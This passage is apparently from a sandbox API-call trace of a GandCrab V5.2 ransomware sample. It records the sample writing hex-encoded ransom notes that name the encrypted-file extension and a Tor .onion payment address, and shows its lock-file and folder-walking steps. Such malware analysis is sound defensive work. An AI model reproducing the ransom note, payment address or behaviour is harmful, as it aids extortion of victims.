x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.355] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0096.356] CloseHandle (hObject=0x2ac) returned 1 [0096.356] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.356] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.356] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x2a4)) [0096.357] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.357] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.357] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.357] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Documents\\My Pictures\\d2ca4a09d2ca4deb61a.lock") returned 63 [0096.357] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\documents\\my pictures\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0096.358] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.358] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.359] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Pictures\\") returned 39 [0096.359] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\*") returned="C:\\Users\\Default\\Documents\\My Pictures\\*" [0096.359] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0xffffffff [0096.359] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\*", lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0xffffffff [0096.359] CloseHandle (hObject=0x2ac) returned 1 [0096.359] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.359] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0096.359] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0096.359] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos") returned="C:\\Users\\Default\\Documents\\My Videos" [0096.359] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\") returned="C:\\Users\\Default\\Documents\\My Videos\\" [0096.359] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.360] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.360] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.360] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.361] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.361] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.361] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.361] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Documents\\My Videos\\\\TITWMVJL-DECRYPT.txt") returned 58 [0096.361] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\documents\\my videos\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0096.362] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x